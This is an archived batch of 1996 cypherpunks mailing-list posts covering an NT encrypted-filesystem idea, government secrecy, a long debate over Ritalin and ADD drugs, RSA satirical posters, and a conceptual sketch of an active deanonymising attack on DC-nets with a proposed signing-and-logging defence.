Moderators accept or reject articles based solely on the criteria posted
in the Frequently Asked Questions. Article content is the responsibility
of the submittor.  Submit articles to ahbou-sub@acpub.duke.edu. To write
to the moderators, send mail to ahbou-mod@acpub.duke.edu.

-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Wed, 10 Jul 1996 03:47:43 +0800
To: Andy Brown <cypherpunks@toad.com>
Subject: RE: What remains to be done.
Message-ID: <2.2.32.19960709151241.0079c304@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:32 AM 7/9/96 +0100, Andy Brown wrote:
>On 09 July 1996 02:04, John F. Fricker[SMTP:jfricker@vertexgroup.com] wrote:
>
>> One of these days Microsoft will officially release NT's IFS SDK. A few
>> "preliminary" and incomplete copies of a 1993 beta release do float around
>> but for a mere $50K there's a company that will sell you the complete source
>> for an IFS. It's a crime that Microsoft hasn't shipped this SDK yet as the
>> Installable File System is one of the great powers of NT.
>
>You can do this with the existing device driver kit since they supply the
>entire source code to the AT hard disk driver.  I took a look and decided
>that it would be too much work for me alone.  They also seem to suggest that
>you can write "filters" that extend the capability of existing drivers.
>
>> So, if someone is interested in coughing up the $50K I know a couple NT
>> programmers just chomping at the bit to build cool IFS's like PGPDrive, etc.
>
>I'm one of them, but this low level device driver stuff makes me shudder!
>
>
>- Andy
>
>

That's why the IFS SDK is so important. Writing device drivers is one thing
and nasty at that but the IFS is higher level and exactly what is needed to
create a PGPDrive that could exist on scsi, ide, tape, network drives,
floppies, cd-roms, etc. A device driver implementation would be married to a
particular controller type.



--j






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 10 Jul 1996 05:04:33 +0800
To: Ernest Hua <cypherpunks@toad.com
Subject: Re: stupid national security excuse again ...
Message-ID: <2.2.32.19960709160022.00f5eed0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:10 AM 7/9/96 -0700, Ernest Hua wrote:
>Ok.  Not that I really care, at this point, who really killed Kennedy
>or whether there was this or that conspiracy, but I am really sick of
>this bull shit "national security" excuse.
>
>What kind of "national security" excuse could there be for the CIA to
>say whether they confirm or deny the employment of some guy (whom they
>could easily discredit by saying that they have nothing to do with
>him)?

It has always seemed to me that when they say "National Security" what they
mean is "Job Security".  Usually this involves some sort of behaviour that
the government (or in-duh-viduals in it) do not want revealed, lest the
scandal might drive them from their job or get them demoted.  (Or their boss
might demand "a peice of the action".)  

Sometimes it is just a relex action to a request for information.  I
remember such excuses being given during the Iran Contra hearings.  They
kept refering to "Country 1" and "Country 2", while the Pacifica commentator
was in the background telling you what each country was and who most of the
"unnamed players" were.  The information was not unknown.  It had been
reported in the foriegn press already.  It was known to other governments.
The only people it was being kept from was the American people.

Makes you wonder just who they are trying to remain secure from...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smith@sctc.com (Rick Smith)
Date: Wed, 10 Jul 1996 02:15:19 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <v01540b00ae0826916ccd@[172.17.1.61]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:01 PM 7/8/96, John F. Fricker wrote:

>Ever hear of home schooling?

Home schooling has its own set of disadvantages. I've done enough teaching
to respect it as a profession, especially when dealing with a small,
evolving set of students. I also respect my own limitations.

>Seems like if your child needs drugs to go to school than perhaps school is
>the problem not that your child's body lacks Ritalin.

I tend to agree, but it doesn't make the problem any easier to solve.
Another alternative to Ritalin would simply be to let him struggle with
school. It worked for me, I guess.

>So it happens that I was talking with a fellow Saturday who grew up on
>Ritalin. He's 36 now and strung out. Life with Ritalin prepared him for
>drugs, you know. They were natural.

I definitely see that as a risk. Without knowing how his parents and
associated medical gurus (if any) were managing the drug, it's hard to tell
if the situations are parallel.

Life without Ritalin prepared me for a life as a coffee addict, I guess.

Rick.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Tue, 9 Jul 1996 20:03:03 +0800
To: "jfricker@vertexgroup.com>
Subject: RE: What remains to be done.
Message-ID: <01BB6D79.86C7C4D0@mirage.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On 09 July 1996 02:04, John F. Fricker[SMTP:jfricker@vertexgroup.com] wrote:

> One of these days Microsoft will officially release NT's IFS SDK. A few
> "preliminary" and incomplete copies of a 1993 beta release do float around
> but for a mere $50K there's a company that will sell you the complete source
> for an IFS. It's a crime that Microsoft hasn't shipped this SDK yet as the
> Installable File System is one of the great powers of NT.

You can do this with the existing device driver kit since they supply the
entire source code to the AT hard disk driver.  I took a look and decided
that it would be too much work for me alone.  They also seem to suggest that
you can write "filters" that extend the capability of existing drivers.

> So, if someone is interested in coughing up the $50K I know a couple NT
> programmers just chomping at the bit to build cool IFS's like PGPDrive, etc.

I'm one of them, but this low level device driver stuff makes me shudder!


- Andy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 10 Jul 1996 06:23:59 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607091507.KAA21447@shade.sctc.com>
Message-ID: <199607091632.JAA20423@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


William Knowles <erehwon@c2.org> writes:

 > I have a problem with people like Mike Duvos who think that
 > folks like myself and others on this list with ADD use
 > having ADD as a crutch for being fidgety, not getting their
 > work done on time, or worst yet, Fired.

Welcome to ADD-Punks folks.

 > I wish people like Mr. Duvos could walk a mile in my shoes
 > before making off the cuff remarks, I wish I could get jobs
 > done on time, I wish that I could finish one project before
 > starting three more! My office looks like someone tossed a
 > hand grenade in it, Proposals to the left, Job quotes to the
 > right, jobs is various states of completion, Lost jobs to my
 > inattentivness to my clients, Lost good clients because of
 > having ADD and not knowing it!

Sounds like my office.  Of course, I usually force myself to get
things done on time, and to be polite to the clients, but the
hand grenade description is perfectly accurate.

 > One of my wishes did come true, and that was finding out
 > that I do have ADD.

This is really a telling statement, isn't it?  After all, we
rarely hear people saying their greatest wish is to find out that
they have liver disease, or cancer, or heart trouble.

The problem here is that we live in a society that won't cut any
slack for normal human diversity unless you have some sort of
official disease defined by the medical profession.  So there is
constant pressure to "medicalize" all sorts of odd things, so
that the people who exhibit certain characteristics don't get
lumped in with the rest of the supposedly unproductive
malcontents.

When you get to the point where, all other things being equal, a
diagnosis makes your life bearable again, it is time to make some
serious changes in your environment.

 > Below is a list of famous people with Attention Deficit
 > Disorders and/or Learning Disorders, and I'd be willing to
 > bet that Perry Metzger either has, or knows someone with
 > ADD.

[snip]

 > One can only wonder how much more great some of the people
 > on this list would be today if they knew ADD back then.

"Albert, you're doing very well on your Ritalin.  Your attendance
has been perfect since you started taking it, and you've finished
every task we've given you on time.  I think you're ready to be
promoted to SENIOR clerk-typist, with a $1 an hour raise in pay.

"Keep taking the medication your doctor prescribes, and you won't
have any more problems dreaming all day about non positive
definite 4-manifolds and null geodesics."

Right. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 10 Jul 1996 06:33:45 +0800
To: Rick Smith <erehwon@c2.org
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <2.2.32.19960709164455.00b3878c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:39 AM 7/9/96 -0500, Rick Smith wrote:
>erehwon@c2.org (William Knowles) writes:
>
>>Ritalin has been a godsend, I am able to dialin when I have to.
>>Ritalin is not the only drug for treating ADD, Prozac works for
>>some.

Prozac works on a different set of brain chemestry. (Prozac messes with the
seretonin level of the brain and how it is reabsorbed.)  There is a whole
series of chemicals similar to Prozac that are prescribed.  It takes a bit
to determine just which one is best for the person involved.  (I have far
too many friends on variations of those drugs.)  The reactions when they
come off them is quite "interesting".  Prozac is not a stimulant however.
(Not in the usual concept of a stimulant.)

>I use coffee, or else I just managed to grow out of the worst effects.
>In any case, I drink more coffee than just about anyone I know, and it
>doesn't "wire" me at all.

"It is by caffiene alone I set my mind in motion.  It is by the beans of
Java that the thoughts acquire speed, the hands acquire shakes, the shakes
become a warning.  It is by caffiene alone I set my mind in motion."

You can build a resistance to caffiene.  (As well as one hell of an
addiction.)  So far I am up to a gram a day of the stuff.  Mix that with the
Seldane-Ds I take every morning (for hay fever) and you get more than a
small amount of stimulants.  (I have found that the Seldane-Ds have a
positive psychoactive effect as well.  They seem to allow me to focus
better.  Probibly because I am not sneezing.)

The long term effects of any stimulant is problbiy not very good.  What
needs to be looked at is what the long term benifits and risks are, for the
individual, not just for the society.  What these sorts of chemicals do to
small children 10-30 years down the road is pretty unknown at this point.
(If any of the things i have seen so far are any indication, they are not good.)

But then, I suspect the government of drugging our kids with school lunches
laced with lead paint, not with mind control drugs. (Lead paint is cheaper.) ]:>

Alan Olsen
Minister of Forced Caffinization - DNRC
---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 10 Jul 1996 05:57:18 +0800
To: cypherpunks@toad.com
Subject: Re: Put Uncle Sam in your Calling Circle
Message-ID: <2.2.32.19960709165403.00e1349c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:15 AM 7/9/96 -0400, you wrote:
>Hey guys,
>
>I just got a really cool poster from RSA.  It's a big circle split off 
>into several sections showing people talking to each other, the upper 
>right hand corner shows two NSA dweebs looking like Bevis & Butthead in 
>suits, one smoking, the other seated infront of an old 60's reel to reel 
>audio tape recorder, a sign on the wall behind them says "Key Escrow"
>
>There are several logos for various government agencies including our 
>friends at No Such Agency and the FBI, a small quote next to the 
>Copyright (C) RSA notice says "One of a series of public relations 
>posters that never made it out of Fort Mede."  Very very funny!
>
>Many many thanks to the cool person(s) at RSA who sent it my way.

You got one too...  I recieved one in the mail with no return address.
There is another poster in that series which says "A good marketing
organization listens to its customers... WE HEAR YOU!".  The woman is being
tapped by the same two government agents.

The posters are done by Tom Tommorow, who also does a cartoon called "This
Modern World" which appears far too infrequently in a number of papers and
_Processed World_.  Incredible political cynicysm...

Thanks again to RSA for a couple of cool posters!
---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Wed, 10 Jul 1996 05:41:55 +0800
To: cypherpunks@toad.com
Subject: Active Attacks on DC-nets
Message-ID: <m23f319xhv.fsf@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



I haven't read the paper on active attacks yet, but here is an easy
example that I thought of, that others might find illuminating:

When there is a round with no messages the server sends garbage to all 
but one of the participants so they think collisions occured. The other 
participant is sent zero so that he or she thinks the channel is open. 
The participants who think colllisions occured are then likely to back
off for a number of rounds, so that if a message is sent it is most likely 
from the participant who wasn't lied to.  

What do people think of the idea of clients signing all input to the
dcnet and the server signing all output and keeping logs so that it could 
be verified afterward (after the damage was done! :) ) whether or not
everything
was carried out properly or not. With Schnorr signatures and precomputation
the clients could still be reasonably quick. The server will have to
do alot of work, but the signature verifications could be done in parallel
on a multiprocessor computer. Verification of the proceedings would also be
long, but it could be done off-line.

-- 
Leonard Janke
(pgp key id 0xF4118611)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Wed, 10 Jul 1996 03:44:20 +0800
To: tcmay@got.net
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <199607091507.KAA21447@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim writes more about Ritalin:

>From what I've read--and I'm no expert, having long had essentially the
>_opposite_ of "attention deficit disorder," assuming it really even
>exists!--most children getting Ritalin are just being sedated. Behavior
>control in its purest form. While the kids stop their wandering attention
>and constant physical motions, it's because they're in a mental fog, just
>one step away from drooling. (The 8-year-old friend of my friend's son is
>so zoned out he can't play video games well at all...until the drugs wear
>off.)

That's very interesting, especially the part about video games. It
sounds like overdosing to me. My wife says that a Ritalin overdose can
also affect your heart rate and ability to sleep.

Regarding video games, we went through some elaborate assessment
process before Alex ended up on Ritalin. The school people did an
assessment declaring he wasn't "learning disabled" but may have ADHD.
Then he saw a behavioral psychologist for a few hours of observation,
yielding the diagnosis. Lastly a different psychologist measured his
behavior using some computer based game/test. The actual dosage was
calibrated according to his effectiveness on the game/test, which
involved memory, coordination, and ability to concentrate on something
fundamentally boring. The test was performed 3 times to compare his
performance before and after dosage.

The point of all this is that there are other ways of using Ritalin.
I don't think I'd tolerate its use on Alex if I didn't trust my wife.
She has a much better background in such things than I, as well as a
family doctor's experience with seeing the results of drug abuse.

>>BarelyObCrypto: ADD is more about lack of attention *control* than lack of
>>attention itself. Hyperfocus is also a trait of ADHD, and computers tend to
>>cause hyperfocus for a lot of ADDers.

>BTW, I saw a comment that Bill Gates is almost certainly an ADD person...or
>maybe the comment was that he is borderline autistic?

This matches my own experiences with ADHD.  That's the thing about the
raw phenomenon and its overall lifestyle effect: you either find your
niche and do OK, or you get sidelined.

Rick.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 10 Jul 1996 03:19:35 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: FUD-Con V: DC
In-Reply-To: <199607090640.CAA11873@unix.asb.com>
Message-ID: <Pine.SCO.3.93.960709095955.10338B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jul 1996, Deranged Mutant wrote:

<snip>
> You sound as if you have not been in a place hit by natural disasters 
> such as earthquakes, hurricanes, major floods, etc.  These cause much 
> more damange to infrastructures as well as human life than any 
> organized action could, save for an all-out physical war.  Life still 
> manages to go on.
> 
> > air conditioning, no food distribution, no light, no radio or TV, no Internet.
> > Are we prepared?  Do we have a a crisis response for the day money as we  know
> > it vanishes?
> 
> Isn't that what FEMA is for?  Do you want FEMA involved with the 
> 'net?  Or would you rather get the DoD, NSA, FBI also involved with 
> "Emergency Management"?!?
> 

I'm running one of the panels at this conference, and it's exactly these
issues that I, too, was wondering about.  I've got the head of INFOSEC for
FEMA and a National Planning Associate for the American Redcross on the
panel with me. These are the guys who DO the stuff you're talking about -
making sure that we can survive a hurricane, etc., with the minimal
damage.  In working with them on the INFOWAR issues, I don't think that
anyone's going to be really pleased with what they have to say.  Expecting
FEMA to be covering national INFOSEC disasters would be logical, but I
don't know if anyone mentioned it to _them_. 

And, if you think the DoD *ISN'T* involved in emergency management, you're
wrong.  I was very surprised, when working with the American Redcross
National HQ on this conference, how much classified information the
Redcross handles, and how tightly integrated they are with DoD 'liason'
offices.  And if Dole wins (God forbid), just wait and see what happens.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 10 Jul 1996 08:49:40 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <ae07da6f070210047c31@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 7/9/96, JR@ns.cnb.uam.es wrote:
>Hey Perry,
>
>        I think you are taking this too far. I believe that almost nobody
>(there are always some exceptions) will deny the existence of disease. And
>while Tim may not be a great doctor and even totally wrong in the case he
>stated, the original point was not to discuss a specific medical case.

Indeed. In reading the comments here, it seems that some are setting up a
straw man series of arguments, and then knocking them down:

-- "Tim says Attention Deficit Disorder does not exist."

-- "Tim says Ritalin does not work."

-- "Tim claims to know better than doctors."

-- "Tim is against using aspirin, penicillin, and other drugs."

-- "Tim wishes to interfere with the choices of others."

And so on.

In actuality, I have made *none* of these points.

Instead, what I recounted was a telling anecdote about the
over-medication--in my opinion of course, based on direct observation--of
the child of a friend of mine. And my larger point was the _hypocrisy_
issue, that we tell our children to "Just say No! to drugs" while popping
pills in their mouths. We are teaching children to "self-medicate." Whether
these children continue to self-medicate later in life is unknown.

As to choice, I am not interfering in any way, despite a strange claim to
the contrary. My friend simply refuses to be a pill dispenser to keep a kid
"controllable," especially when he has seen the kid in an "unmedicated"
state and finds him much more personable, happy, and eminently
controllable. The mother, Vickie, simply cannot impose discipline on him
and, in our opinion, uses his Ritalin dose to control him.

Quibbling about whether Ritalin is or is not a depressant, or a stimulant,
or whatever, misses the main points.

I personally never got into the drug thing, and my only drugs of choice are
caffeine (taken straight, in caffeine tablets) and alcohol (preferably in
the form of bourbon or Kentucky sour mash). But if I were advising a
child--my own, or others--I would never lie to them about how horrible all
drugs are, and especially I would challenge "D.A.R.E." programs which use
school time to brainwash them.

I sometimes wear a t-shirt I bought over the Net: "D.A.R.E.  I turned in my
parents and all I got was this lousy t-shirt."

(Explanation for non-U.S. persons: "D.A.R.E." stands for "Drug Abuse
Resistance Education," a multi-week school program which brings in local
law enforcement officers to explain the evils of all drugs and which
teaches children how to contact school officials, local law enforcement,
and Child Protective Services should they detect drugs in their homes. This
part has been very controversial, as children turn in their parents for
smoking pot. Even the schools and cops realized things had gotten out of
hand when children were contacting the authorities for wine-drinking and
other such legal drug consumptions. Not surprisingly, civil libertarians
draw parallels with the case of Pavel Morozov, the "Young Hero" of the
Soviet Union who turned in his parents to Stalin's secret police. Hence the
message of the t-shirt.)

Personally, I think these issues are related to Cypherpunk themes. Telling
children to "Just say No! to drugs" without providing nuanced
interpretations of which specific drugs are dangerous, and why, is
esentially lying to them. Dosing them with uppers and downers contradicts
the simplistic message. And teaching them to narc out their parents is
despicable.

Anyone for "C.A.R.E."? Crypto Abuse Resistance Education. "So, boys and
girls, be sure to tell your teacher if you see your Dad or your Mom using
any illegal computer codes. It's for their own good, and they'll thank you
for helping them to be reeducated."

>        And from the very onset Tim explained his point in not building
>a mental control society. And there's no point in denying that it is far
>easier for most societies to have full mental control of their subjects
>(to which technology aids) than to fix the big social problems.

Indeed. My original points seem to be have gotten distorted by others.

(And you ought to see a couple of foaming-at-the-mouth personal messages I
have gotten, including one from a woman "on lithium" (no, not any of the
few regular women posters here). Hey, if "lithium" works, fine. But I
wouldn't pop lithium pills in a child's mouth without some real careful
consideration.)

My point about the mother I mentioned is that she _appears_ to be using
Ritalin to make her child more sedate and more controllable, when my friend
finds that old-fashioned methods work quite well. And my friend has no
plans to be the dispenser of uppers and/or downers to his son's friends.
Children on drugs will have to find their methods of delivery.

And to all those on this list who assume I am "insulting" their ADD
condition, go back and reread my post. I never claimed that ADD does or
does not exist. Maybe it does. Maybe it is partly exaggerated. In any case,
my point was that we cannot tell children that all drugs are evil and then
give them mind-altering drugs. And believe me, most children are bright
enough to eventually see the hypocrisy.

(I should stop now, but I just have to mention the LSD scares of the
mid-60s. As LSD hit the mainstream media, we were bombarded by stories of
how people thought they could fly out of buildings while on LSD. One famous
case, that of Art Linkletter (the Oprah Winfrey of his day). His daughter,
he claimed, flew out of a building while on LSD. Many years later he
admitted--as I recall--that she had long been suffering from major
depression, and that it was most probably a standard suicide...tragic, but
not really caused by LSD. In any case, people in the 60s heard these scare
stories, saw the reality of how their friends behaved on acid, and realized
they'd been fed a line of scare-mongering hype. The dangers of crying
"Wolf!" falsely. This process was repeated a decade or so later with the
media propagating tales of people on "angel dust" (PCP) putting babies in
microwave ovens and committing suicide in horrific ways. True or not, for
whatever twisted reasons, these cases were used to "manufacture consent"
about the dangers of PCP. And then there were the "crack babies," which
more recent analysis shows largely to be a myth. And so on. The Four
Horsemen are riding high.)

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 10 Jul 1996 07:33:18 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607091535.LAA13709@jekyll.piermont.com>
Message-ID: <199607091726.KAA01626@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

 > Of course, drugs can also be damaging. One tablet of
 > Tylenol is not so bad. 100 destroy your liver. An
 > occassional drink rarely hurts. Being falling down drunk at
 > all times is unlikely to improve your life.

I will never take Tylenol.

Acetaminophen is an interesting compound.  It is a potent
hepatotoxin, but is broken down "just in time" by liver enzymes
when it is taken in small quantities.  Hence it usually doesn't
kill you.

The Catch-22 here is that people whose livers are impaired for
various reasons may not be able to metabolize it before it does
its damage, and their livers may be destroyed.  These people may
not have any other symptoms which indicate to them that they have
liver disease.

There have been a number of cases of liver damage requiring
transplantation, one which involved taking only a couple of
tablets more than the recommended daily dose.

Coincidentally, one of the morning shows had a piece today on a
baby that required a liver transplant for a Tylenol overdose,
just before I read your message.  Seems the package of Tylenol
said to consult a physician for the correct dosage if a child was
under two years of age.  The mom called the doctor and he gave
her the dosage for "Children's Tylenol." The mother,
unfortunately, was using "Infant Tylenol", which is slightly more
concentrated, and the baby lost her liver as a result of this
unfortunate miscomunication.

Despite the marketing hype, the risks of acetaminophen just
aren't worth it for a medication whose only purpose is to serve
as a mild analgesic.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Wed, 10 Jul 1996 04:39:01 +0800
To: erehwon@c2.org
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <199607091539.KAA23533@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


erehwon@c2.org (William Knowles) writes:

>Ritalin has been a godsend, I am able to dialin when I have to.
>Ritalin is not the only drug for treating ADD, Prozac works for
>some.

I use coffee, or else I just managed to grow out of the worst effects.
In any case, I drink more coffee than just about anyone I know, and it
doesn't "wire" me at all.

Rick.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Wed, 10 Jul 1996 09:08:37 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <199607091814.LAA11007@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 9,  9:21am, Rick Smith wrote:
> >Seems like if your child needs drugs to go to school than perhaps school is
> >the problem not that your child's body lacks Ritalin.

One thing we need to remember is that life, not just school,
is full of boring, repetitive tasks, even for the hi & mity.
You have to figure out how to do them.  This is one very difficult
*lifetime* problem for those with add-like behaviors.  Also, add
people need credentials & good jobs like everyone else, so they
have to be able to perform well enuf in school to get good recs
& good marks in subjects that interest them.  They didn't make this
system, but they do have to adapt to it somewhat.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Wed, 10 Jul 1996 04:04:28 +0800
To: cypherpunks@toad.com
Subject: Put Uncle Sam in your Calling Circle
Message-ID: <Pine.SUN.3.91.960709111153.3387B-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


Hey guys,

I just got a really cool poster from RSA.  It's a big circle split off 
into several sections showing people talking to each other, the upper 
right hand corner shows two NSA dweebs looking like Bevis & Butthead in 
suits, one smoking, the other seated infront of an old 60's reel to reel 
audio tape recorder, a sign on the wall behind them says "Key Escrow"

There are several logos for various government agencies including our 
friends at No Such Agency and the FBI, a small quote next to the 
Copyright (C) RSA notice says "One of a series of public relations 
posters that never made it out of Fort Mede."  Very very funny!

Many many thanks to the cool person(s) at RSA who sent it my way.

==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 10 Jul 1996 04:58:13 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607090706.AAA03569@netcom14.netcom.com>
Message-ID: <199607091535.LAA13709@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
>  > They cease to play incessantly with fidget toys and they get
>  > on with their lives. Maybe you would prefer to "help" them
>  > by not letting them get medication. Maybe its "unnatural".
>  > Could you explain to me, however, how you are making their
>  > lives better by not giving them their meds? I mean, what
>  > concretely is better about their lives?
> 
> If someone has some sort of cognitive disability which can be
> diagnosed and for which treatment with medication is appropriate,
> I have no problem with that.  But vague claims that "Johnny won't
> sit still" hardly constitute such a workup.

You are dodging the point. There are lots of people for whom it is
easily demonstrated that a small dose of Ritalin makes a dramatic
change in their quality of life. The scientific studies are numerous,
and unless you are prepared to tell me what flaws you find in the
studies you have not even examined, I do not see that you have
evidence backing your opinion. Given that there are people who are
demonstrably helped in their lives by Ritalin, could you explain to me
why it is that they should not be taking the medication? Please back
your statement up with documentation published in a refereed journal
or conference paper -- not with Mike Duvos' off the cuff opinion based
on his years as a computer professional.

>  > You miss the point. You spoke of involuntarily medicated
>  > kids. Most of the kids aren't involuntarily medicated.
> 
> Let's see.  At the beginning of this message, you were
> questioning Tim's qualifications to suggest kids were
> overmedicated.  Now you are telling us that the kids are
> qualified to give informed consent to the very same thing.
> 
> Hardly consistant, even for you Perry.

Totally consistant. It is a person's own business, not a third party's
business, to decide what they should be ingesting and when. Tim is
supposedly a libertarian and supposedly opposed to drug laws that
prohibit people from taking what they want when they want, or,
presumably, deciding for their children what they should be
consuming. He also supposedly thinks that people should keep their
nose out of the personal choices made by others, and gets downright
cantakerous when anyone voices the least opinion about how he runs his
life. However, if a family, with the willing consent of their child,
decides to make a choice about how to best watch out for the welfare
of their own child, Tim sanctimoniously chimes in, along with the rest
of the peanut gallery.

I mean, Tim would be offended if anyone told him what to take, but he
feels perfectly happy telling other people how to run THEIR lives.

So, yes, I'm consistant. Its my business, and mine alone, if I shoot
morphine, or take Penicillin, or decide to do none of these
things. I may choose to consult with a doctor about my condition on
the premise that he is a qualified professional and can render me an
educated opinion. Tim's opinion is, however, neither educated nor
wanted. He should mind his own business with the zealous rage he
applies to those who attempt to mind his business.

I'm consistant. Tim, and possibly you, are hypocrites.

> Seriously, though, the really dumb thing in all of this is the
> constant pretending that drugs both do and don't have the ability
> to enhance performance.  We vascilate between "Drugs are never
> the solution" and "Take this pill twice a day with a glass of
> water."  This is a very mixed message indeed.

You don't hear me giving it, do you?

Drugs are wonderful things at times. A dose of morphine a few times a
day can make the difference between unbearable pain and being able to
function. A tablet of common aspirin can utterly change your day from
an experience filled with headache to a productive and happy one. A
dose of any one of several antidepressants can take people who have
repeatedly attempted suicide and at the very least give them enough
time to work out their problems and learn to deal with life.

Of course, drugs can also be damaging. One tablet of Tylenol is not so
bad. 100 destroy your liver. An occassional drink rarely hurts. Being
falling down drunk at all times is unlikely to improve your life.

Drugs are sometimes of use, sometimes not of use. Any use has to be
evaluated by the person contemplating taking the drug. Any mixed
message does not originate from me.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Tue, 9 Jul 1996 20:25:56 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960709113758.21004cc9@ROCK.CNB.UAM.ES>
